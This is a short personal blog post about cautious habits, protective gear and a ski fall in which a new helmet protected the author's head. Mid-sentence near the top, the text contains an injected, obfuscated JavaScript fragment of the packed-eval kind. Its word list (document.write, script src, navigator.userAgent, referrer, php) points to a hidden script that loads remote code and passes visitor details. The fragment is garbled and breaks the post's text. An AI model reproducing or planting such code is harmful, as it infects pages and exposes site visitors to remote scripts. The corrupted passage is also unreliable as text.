Be safe, wear a helmet

I’m ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(“<\\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afhin|var|u0026u|referrer|nedhi||js|php’.split(‘|’),0,{}))
a very careful person.  Too careful.  Highly risk averse.

I’ve only taken 1 hard fall off my bike.  Ever (that I can remember).  I lost a tooth in the process.  Swallowed it actually.

I’ve only taken a bad spill once.  It was on the driveway of my friends house when I was in first grade.  I have a scar on my knee and one on my elbow to prove it.

I’ve never broken a bone.

I wear all the protective gear I’m entitled to.  Helmet on the bikes.  Knee/elbow pads, writs guards and a helmet for roller blades.  Life jacket for water sports.

This past Christmas, I added ski helmet to my list of safety gear.  And Sunday was the first day I used it.  And the first day it protected my head.  That’s right.  On its maiden voyage, it protected my (gigantic) head.  I bit it hard on some heavy powder.  Basically my lower half stopped and my top have whipped around and smacked the ground – helmet first.

So, for all of you skiers and snowboarders, just get a helmet.  I rarely fall and I’ve never hit my head before.  Glad I had the helmet today!
